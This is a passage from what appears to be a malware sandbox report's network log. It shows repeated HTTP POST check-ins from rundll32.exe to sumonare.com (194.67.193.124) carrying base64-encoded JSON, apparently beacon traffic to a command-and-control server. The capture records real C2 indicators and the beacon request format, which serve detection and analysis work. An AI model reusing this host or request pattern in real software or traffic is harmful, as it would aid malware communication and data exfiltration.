                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:54.490509987 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:54 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.749747194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:54.644781113 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:55.468754053 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:55 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.749748194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:55.612826109 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:56.420331001 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:56 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.749749194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:56.654851913 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:57.470511913 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:57 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.749750194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:57.612720966 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:58.460216045 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:58 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.749751194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:58.613661051 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:59.424752951 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:59 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.749752194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:59.565102100 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:00.388649940 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:00 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.749753194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:00.536103010 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:01.326284885 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:01 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.749754194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:01.470710993 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:02.318802118 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:02 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.749756194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:02.471673965 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:03.278069019 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:03 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.749757194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:03.434947968 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:04.267060995 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:03 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                37192.168.2.749759194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:04.414860964 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
